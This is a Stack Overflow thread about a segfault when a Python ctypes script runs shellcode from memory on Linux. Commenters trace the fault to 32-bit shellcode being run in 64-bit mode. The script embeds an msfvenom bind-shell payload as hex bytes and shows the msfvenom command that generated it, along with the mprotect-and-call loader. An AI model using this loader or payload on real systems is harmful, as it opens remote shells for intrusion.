# Python Ctypes function call Segmentation Fault when used on Unix systems

Tags: python, c, assembly, x86, ctypes

**Background:**

Writing a proof of concept that includes executing machine code it within the running python process. Wanting to make the functionality cross platforms, but problem arises when tested against unix systems.

Almost exactly like this question: [Python ctypes and function calls](https://stackoverflow.com/questions/275207/python-ctypes-and-function-calls) but the solution does not work this time.

**Problem**: When executing the python script in VM 32bit Ubuntu server 12.04.5 LTS, the output says

```
Segmentation fault (core dumped)
```

Which means I am getting denied for accessing memory that I don't have permission for. This is strange b/c in the source code I also set  cytpes.mprotect(allocated_space, space_size, 7) <== 4 + 2 + 1 is for wrx permissions

**NOTE:** Please do not try to execute the following machine code on a machine without having full consent from owner for testing purposes.

**Python Script**:

```
 #!/usr/bin/env python

import ctypes
import os
import sys

# linux machine code
buf += "\xbd\xfc\xa1\x5d\x63\xd9\xee\xd9\x74\x24\xf4\x5e\x31"
buf += "\xc9\xb1\x1c\x31\x6e\x14\x03\x6e\x14\x83\xee\xfc\x1e"
buf += "\x54\x37\x1e\x86\x0e\x7a\xe7\x8f\x31\x6b\xe8\xef\xb8"
buf += "\x68\x8e\x6e\x59\x6e\xbf\xbd\x1e\x5e\xe4\xca\xfc\xf2"
buf += "\x59\x67\x69\xf7\xd4\x66\xdd\x91\x2b\xe8\x4f\x34\xb0"
buf += "\xbc\x05\xca\xd2\x3d\x8a\x5d\xab\xdc\x40\x6c\xf7\x74"
buf += "\xf3\x28\xca\x08\x6c\x4b\x10\x1c\xca\x17\xc7\x4e\x84"
buf += "\xa5\xf7\x7f\x08\xc0\xe7\x2e\xe0\x9d\xe9\xba\x66\xc6"
buf += "\x24\xba\xb6\x15\x06\xdc\xf5\x5a\x37\x63\xb6\x3d\x31"
buf += "\x32\xb2\x0c\xc1\x27\x0c\x82\x72\x44\xbc\x1b\xf5\x95"
buf += "\x65\xac\xfc\xe4\x1a\x33\xe1"



def main(buf):
    if os.name == 'posix':                                                 
        try:                              
            libc = ctypes.CDLL('libc.so.6')                                
            buf_ptr = ctypes.c_char_p(buf)                               

            size = len(buf)                                          
            addr_freespace = ctypes.c_void_p(libc.valloc(size))                 
            ctypes.memmove(addr_freespace, buf_ptr, size)                            
            libc.mprotect(addr_free_space, size, 1 | 2 | 4)   # changed to 7 for all three access                    
            run = ctypes.cast(free_space, ctypes.CFUNCTYPE(ctypes.c_void_p))
            run()                                                           
            sys.exit()                                                                    
        except Exception as e:
            print "Error: " e

    else:                                                                   
        try:  # windows implementation



if __name__ == '__main__':
    main(buf)
```

**Question:**  Can someone explain why does the segmentation fault message appear and how do we fix such problem?

**Credits**: this unix implementation originated at [sickle.py @ Line743-753](https://github.com/wetw0rk/Sickle/blob/master/sickle.py)

The only difference is the reference script is using python 3, while I am using python 2.7.

**UPDATE**:

After many trials and errors, including running the program in pdb. The segmentation fault error happened after the line of:

```
run()
```

*Can someone please explain why this is happening?*

**Edit:**

machine code/shellcode generated using:

```
msfvenom --payload linux/x86/shell/bind_tcp  --format py --arch x86 --bad-char "\x00\x20\x0d"
```

This PoC is inspired by Professor Viviek of SPSE and [twittor](https://github.com/PaulSec/twittor)

**Using strace to pinpoint**

the result prior to segmentation fault are as follow:

```
mprotect(0x11ad000, 137, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
capget(0x1, 0, {CAP_CHOWN|CAP_FSETID|CAP_SETGID|CAP_NET_BIND_SERVICE|CAP_SYS_MODULE|CAP_SYS_CHROOT|CAP_SYS_PTRACE|CAP_SYS_BOOT|CAP_SYS_NICE|CAP_SETFCAP, CAP_CHOWN|CAP_DAC_OVERRIDE|CAP_FSETID|CAP_SETUID|CAP_LINUX_IMMUTABLE|CAP_NET_BIND_SERVICE|CAP_NET_ADMIN|CAP_NET_RAW|CAP_IPC_OWNER|CAP_SYS_CHROOT|CAP_SYS_PTRACE|CAP_LEASE|CAP_AUDIT_WRITE|CAP_SETFCAP, CAP_CHOWN|CAP_DAC_OVERRIDE|CAP_SETPCAP|CAP_NET_BIND_SERVICE|CAP_NET_BROADCAST|CAP_IPC_LOCK|CAP_IPC_OWNER|CAP_SYS_NICE|CAP_SYS_RESOURCE|CAP_SYS_TIME|CAP_SYS_TTY_CONFIG|CAP_SETFCAP}) = -1 ENOMEM (Cannot allocate memory)
getuid()                                = -1 EINVAL (Invalid argument)
getuid()                                = -1 EFAULT (Bad address)
--- SIGSEGV (Segmentation fault) @ 0 (0) ---
+++ killed by SIGSEGV (core dumped) +++
```

Comment: Use a debugger to pinpoint the fault. Also, check for errors from the system calls. Alternatively, use `strace`.

Comment: Whatever makes you think you could simply copy executable code to another position and expect the code to work in the new position?

Comment: @Jester Will try strace, and update the results accordingly.

Comment: @EOF what do you mean by that? It should work, as it did in windows based system with virtualalloc rtlmemorymove createThread function calls, the problem of segmentation fault happens only dealing with POSIX systems

Comment: Why do you believe that it "should work"? And Posix is not Windows.

Comment: @EOF Yeah posix is not windows, and this is exactly why I am asking the question, I wanted to make the functionality can be used crossed platforms. Did I miss something on posix implementations? The sample script seemed to work on other examples on the web. That said I know posix systems have more protection on the working call stack and that is why I am getting the segfault, but that is strange since mprotect should give the executable memory space the permission it needed.  I was just hoping for a way around it.

Comment: First of, I would *strongly* suspect that this will fail on Windows too, if you try copying a function that is less trivial than the one you are testing. Fundamentally, copying executable code can *only* work if you relocate the references in the code, particularly relative external references and absolute internal references.

Comment: @EOF yes it does work in windows. As posted on the question, the following link contains the exact problem I am having/replicating, but solution to the link does not work in this scenario. [link](https://stackoverflow.com/questions/275207/python-ctypes-and-function-calls)  and 
[reference-line743-753](https://github.com/wetw0rk/Sickle/blob/master/sickle.py)

Comment: Can you show us the actual machine code you are using in `buf`? Could be you are modifying a non volatile register and not properly restoring it.

Comment: @MichaelPetch Please see the recent edit. The machine code is generated using msfvenom's shellcode (for pure educational purpose) maybe it's because the shellcode modifies one of the non writable registers during the python process?

Comment: @Jester Please see the recent edit that includes the result from strace. I am not very familiar with the outputs of strace, but from the looks of it Cannot allocate memory was the cause of the segfault, how would we get around it, and is it because libc.valloc didn't properly allocate?

Comment: Can you post the assembly code before you encoded with venom?

Comment: @MichaelPetch I only used msfvenom to generate the shellcode. To get the assembly I would need to dump it back to  binary and disassemble ?

Comment: Since your strace output doesn't make much sense, verify that you are not trying to run a 32 bit shellcode in 64 bit mode.

Comment: That is in fact likely, since the `getuid` syscall has number 102 in 64 bit mode, and that corresponds to `socketcall` in 32 bit mode. The latter would of course make sense in a shell code intended to play with sockets. So either generate a 64 bit shellcode or run your code in 32 bit mode.

Comment: I agree with @Jester. I find it interesting though that you claim you are using 32-bit Ubuntu 12.04 LTS. You sure about that that? To tell can you show us the output of the command `uname -a`

Comment: @Jester and MichaelPetch you guys are right. This was such a terrible mistake on my part. The Ubuntu VM is 64 bit, after feeding the script a 64 bit machine code, it ran successfully. Thank you Jester for pointing that out, wish I can upvote, but not enough reps.

Answer (score 1, accepted):

The system information was bad, the VM is running on x64 architecture, so inputting a x64 code into the script worked beautifully. Finally solved the mystery, thank you @Jester for pointing out and pin pointing the problem.